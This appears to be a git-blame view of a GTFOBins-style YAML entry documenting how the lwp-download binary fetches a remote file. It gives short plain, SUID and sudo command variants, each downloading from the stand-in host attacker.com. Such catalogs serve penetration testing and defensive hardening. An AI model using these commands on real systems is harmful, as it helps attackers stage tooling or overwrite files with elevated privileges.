2020-03-17 07:19:30 +01:00
|
|
|
---
|
2020-03-17 20:41:18 +01:00
|
|
|
description: Fetch a remote file via HTTP GET request.
|
2020-03-17 07:19:30 +01:00
|
|
|
functions:
|
|
|
|
file-download:
|
2020-03-17 20:41:18 +01:00
|
|
|
- code: |
|
|
|
|
URL=http://attacker.com/file_to_get
|
|
|
|
LFILE=file_to_save
|
2020-03-17 07:19:30 +01:00
|
|
|
lwp-download $URL $LFILE
|
|
|
|
suid:
|
2020-03-17 20:41:18 +01:00
|
|
|
- code: |
|
|
|
|
URL=http://attacker.com/file_to_get
|
|
|
|
LFILE=file_to_save
|
2020-03-17 07:19:30 +01:00
|
|
|
./lwp-download $URL $LFILE
|
|
|
|
sudo:
|
2020-03-17 20:41:18 +01:00
|
|
|
- code: |
|
|
|
|
URL=http://attacker.com/file_to_get
|
2020-03-17 07:19:30 +01:00
|
|
|
export LFILE=file_to_save
|
2020-06-10 22:53:45 +02:00
|
|
|
sudo lwp-download $URL $LFILE
|
2020-03-17 07:19:30 +01:00
|
|
|
---
|